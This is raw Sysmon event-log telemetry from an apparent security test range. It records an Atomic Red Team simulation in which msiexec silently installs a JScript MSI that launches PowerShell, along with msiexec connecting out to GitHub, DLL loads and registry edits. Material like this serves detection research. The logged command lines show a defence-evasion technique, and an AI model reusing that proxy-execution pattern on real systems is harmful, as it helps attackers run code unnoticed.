Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693400Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693399Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693379Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693374Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693373Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693372Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693369Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693368Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.991{7CF983DC-9824-62AC-226B-000000006202}35324524C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002693367Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.996{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9824-62AC-226B-000000006202}3532C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002693279Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.968{7CF983DC-9824-62AC-236B-000000006202}4536C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9824-62AC-226B-000000006202}3532C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002693271Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:08.913{7CF983DC-9824-62AC-226B-000000006202}3532C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002692899Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.897{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002692898Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.897{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002692897Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692896Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002692895Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002692894Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002692893Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692892Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692891Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692890Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692889Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002692888Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002692887Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.897{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI3697.tmpMD5=47B535A9C2480FAD4788850FF2AE76D2,SHA256=3293A5CB821F391F6B0E1328D23B15047C4A43EFBFEEF5FEA057DBACDBD68D85falsetrue 354300x80000000000000002692812Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:04:59.246{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15-64426-false185.199.110.133-443- 10341000x80000000000000002692810Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.850{7CF983DC-EE57-62A8-2300-000000006202}20082724C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\Sysmon64.exe+bd33b|C:\Windows\Sysmon64.exe+be6fc|C:\Windows\Sysmon64.exe+bf5c9|C:\Windows\Sysmon64.exe+c36ba|C:\Windows\Sysmon64.exe+c7f13|C:\Windows\Sysmon64.exe+d8d92|C:\Windows\Sysmon64.exe+d8ea5|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002692809Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.850{7CF983DC-EE57-62A8-2300-000000006202}20082724C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Sysmon64.exe+dfd9a|C:\Windows\Sysmon64.exe+c7bd4|C:\Windows\Sysmon64.exe+d8d92|C:\Windows\Sysmon64.exe+d8ea5|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 22542200x80000000000000002692581Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:04:59.158{7CF983DC-981D-62AC-1A6B-000000006202}4840raw.githubusercontent.com0::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;C:\Windows\system32\msiexec.exeNT AUTHORITY\SYSTEM 10341000x80000000000000002692580Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.600{7CF983DC-EE57-62A8-2300-000000006202}20082732C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\Sysmon64.exe+bd33b|C:\Windows\Sysmon64.exe+be6fc|C:\Windows\Sysmon64.exe+bf5c9|C:\Windows\Sysmon64.exe+d7148|C:\Windows\Sysmon64.exe+b3a3d|C:\Windows\Sysmon64.exe+b3b07|C:\Windows\System32\sechost.dll+3625|C:\Windows\System32\sechost.dll+2bfd|C:\Windows\System32\sechost.dll+2a01|C:\Windows\System32\sechost.dll+18df|C:\Windows\Sysmon64.exe+b3c9a|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 22542200x80000000000000002692579Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:04:58.924{7CF983DC-981D-62AC-1A6B-000000006202}4840github.com0::ffff:192.30.255.112;C:\Windows\system32\msiexec.exeNT AUTHORITY\SYSTEM 10341000x80000000000000002692578Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:03.600{7CF983DC-EE57-62A8-2300-000000006202}20082732C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\Sysmon64.exe+bd33b|C:\Windows\Sysmon64.exe+be6fc|C:\Windows\Sysmon64.exe+bf5c9|C:\Windows\Sysmon64.exe+d7148|C:\Windows\Sysmon64.exe+b3a3d|C:\Windows\Sysmon64.exe+b3b07|C:\Windows\System32\sechost.dll+3625|C:\Windows\System32\sechost.dll+2bfd|C:\Windows\System32\sechost.dll+2a01|C:\Windows\System32\sechost.dll+18df|C:\Windows\Sysmon64.exe+b3c9a|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 354300x80000000000000002692348Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:04:58.932{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15-64425-false192.30.255.112-443- 10341000x80000000000000002692347Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.819{7CF983DC-EE57-62A8-2300-000000006202}20082724C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\Sysmon64.exe+bd33b|C:\Windows\Sysmon64.exe+be6fc|C:\Windows\Sysmon64.exe+bf5c9|C:\Windows\Sysmon64.exe+c36ba|C:\Windows\Sysmon64.exe+c7f13|C:\Windows\Sysmon64.exe+d8d92|C:\Windows\Sysmon64.exe+d8ea5|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002692346Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.819{7CF983DC-EE57-62A8-2300-000000006202}20082724C:\Windows\Sysmon64.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Sysmon64.exe+dfd9a|C:\Windows\Sysmon64.exe+c7bd4|C:\Windows\Sysmon64.exe+d8d92|C:\Windows\Sysmon64.exe+d8ea5|C:\Windows\Sysmon64.exe+164388|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002692142Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002692141Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024848C:\Windows\System32\MsiExec.exe{7CF983DC-981E-62AC-1E6B-000000006202}3668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002692136Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.635{7CF983DC-981E-62AC-1E6B-000000006202}3668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding E94EFC5B984B074B60D8A3559AD758E4WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002692115Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002692114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002692113Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002692112Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002692111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.631{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002692110Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.631{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002692106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.631{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692081Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 